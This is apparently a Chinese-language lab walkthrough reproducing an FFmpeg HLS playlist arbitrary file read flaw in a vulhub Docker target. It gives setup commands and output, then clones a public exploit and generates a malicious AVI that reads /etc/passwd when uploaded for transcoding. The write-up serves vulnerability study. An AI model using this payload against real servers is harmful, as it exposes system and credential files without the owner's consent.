漏洞描述
2.8.12之前的FFmpeg、3.1.9之前的3.0.x和3.1.x、3.2.6之前的3.2.x和3.3.2之前的3.3.x未正确限制HTTP Live Streaming文件扩展名和解复用器名称，这允许攻击者通过特制的播放列表数据读取任意文件。
环境搭建可以查看我的这篇文章
https://developer.aliyun.com/article/1113693?spm=a2c6h.26396819.creator-center.8.22fb3e18sKKMLR
目录为
/vulhub-master/ffmpeg/phdays
运行命令

docker-compose build
docker-compose up -d

返回结果

[root@localhost phdays]# docker-compose build
web uses an image, skipping
[root@localhost phdays]# docker-compose up -d
Creating network "phdays_default" with the default driver
Pulling web (vulhub/ffmpeg:3.2.4-with-php)...
Trying to pull repository docker.io/vulhub/ffmpeg ... 
3.2.4-with-php: Pulling from docker.io/vulhub/ffmpeg
3192219afd04: Pull complete
a9edd0f1d92a: Pull complete
a281efe2cee1: Pull complete
Digest: sha256:3883006c9e8975361580e2634a78244da37214bda4e986b5b3c81a4b01d8c882
Status: Downloaded newer image for docker.io/vulhub/ffmpeg:3.2.4-with-php
Creating phdays_web_1 ... done
[root@localhost phdays]# docker ps
CONTAINER ID        IMAGE                          COMMAND                  CREATED             STATUS              PORTS                    NAMES
3e74cdeb6dce        vulhub/ffmpeg:3.2.4-with-php   "php -S 0.0.0.0:80..."   37 seconds ago      Up 34 seconds       0.0.0.0:8080->8080/tcp   phdays_web_1

靶机ip：192.168.0.11：8080
载exp，并生成payload：

漏洞复现

下载exp

git clone https://github.com/neex/ffmpeg-avi-m3u-xbin
cd ffmpeg-avi-m3u-xbin

生成payload

./gen_xbin_avi.py file:///etc/passwd exp.avi

生成exp.avi，在http://your-ip:8080/上传。后端将会将你上传的视频用ffmpeg转码后显示，转码时因为ffmpeg的任意文件读取漏洞，可将文件信息读取到视频中